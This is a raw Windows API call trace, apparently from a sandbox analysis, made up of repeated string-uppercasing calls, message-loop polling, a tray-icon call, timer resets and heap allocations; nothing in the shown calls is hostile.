[0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.734] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.735] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.736] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.736] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.736] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.736] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.737] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.738] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.739] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.740] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.742] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.743] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.744] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.745] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.747] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.748] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.749] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.750] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.751] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.752] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.753] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.754] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.480] TranslateMessage (lpMsg=0x61f354) returned 0 [0072.480] DispatchMessageW (lpMsg=0x61f354) returned 0x0 [0072.480] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0072.480] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.480] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e9f0) returned 1 [0072.480] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0072.480] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.481] KillTimer (hWnd=0x4011e, uIDEvent=0x1) returned 1 [0072.481] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0072.481] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.481] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.481] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.481] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.482] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.482] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.482] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.482] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.482] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.483] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.483] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.483] 